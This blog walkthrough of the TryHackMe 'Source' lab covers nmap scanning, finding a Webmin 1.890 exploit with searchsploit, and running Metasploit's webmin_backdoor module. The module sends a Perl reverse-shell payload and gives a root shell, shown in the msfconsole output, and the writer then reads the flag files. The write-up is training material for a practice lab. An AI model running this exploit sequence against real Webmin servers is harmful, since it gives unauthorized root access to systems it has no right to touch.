Tryhackme - Source

Tryhackme – Source

In this walk through, we will be going through the Source room from Tryhackme. This room is rated as easy on the platform and is based on the exploitation of a recent vulnerability by hacking Webmin which is a web-based system configuration tool. On that note, let’s get started without any delay.


Machine Info:

ObjectiveEnumerate and root the box attached to this task. Can you discover the source of the disruption and leverage it to take control?

Task 1 – Embark


  • I started with our good old nmap scan. Found two ports open – 22 (SSH) and 10000 (Webmin). Well the later is an interesting one. Let’s find out more.

sudo nmap -sS -sV 

Tryhackme - Source

  • I can see there is a login portal on port 10000. I tried the default webmin password –admin:admin however no luck.

Tryhackme - Source

  • Next i searched the webmin 1.890 in searchsploit to see if any public exploit is available for it. Found one and that too a metasploit module. Nothing can be better than this.

searchsploit webmin 1.890

Tryhackme - Source

Exploitation and getting root:

  • Moving on, i used the “Webmin password_change.cgi Backdoor” exploit get the root shell and eventually getting the required two flags.

wh1terose@fsociety:~$ msfconsole

[*] Starting persistent handler(s)...

msf6 > search webmin

Matching Modules

   7  exploit/linux/http/webmin_backdoor             2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor

msf6 > use exploit/unix/webapp/webmin_backdoor

msf6 exploit(unix/webapp/webmin_backdoor) > set LHOST
msf6 exploit(unix/webapp/webmin_backdoor) > set RHOSTS 
msf6 exploit(unix/webapp/webmin_backdoor) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true

msf6 exploit(unix/webapp/webmin_backdoor) > exploit

[*] Started reverse TCP handler on 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened ( -> at 2023-06-07 23:58:55 +0530

uid=0(root) gid=0(root) groups=0(root)

find / -name user.txt -type f 2>/dev/null
cat /home/dark/user.txt
cat /root/root.txt

Tryhackme - Source

Tryhackme - Source

Tryhackme - Source

Tryhackme - Source

Tryhackme - Source

Question 1 – user.txt


Question 2 – root.txt


Tryhackme - Source

Also Read: Tryhackme – Solar, exploiting log4j



So that was “Source” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection, two ports opened – 22 (SSH) and 10000 (Webmin). Next, we checked the webmin login panel, tried some default username/password but found no luck. Next, serach the webmin version in searchsploit and got a hit of a known Metasploit exploit. At last, used the Metasploit Webmin exploit module to get a RCE on the server and got the flags from the North Korea parliament rooftop. On that note, i will take your leave and will see you in next one, Till then “Hack the Planet”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top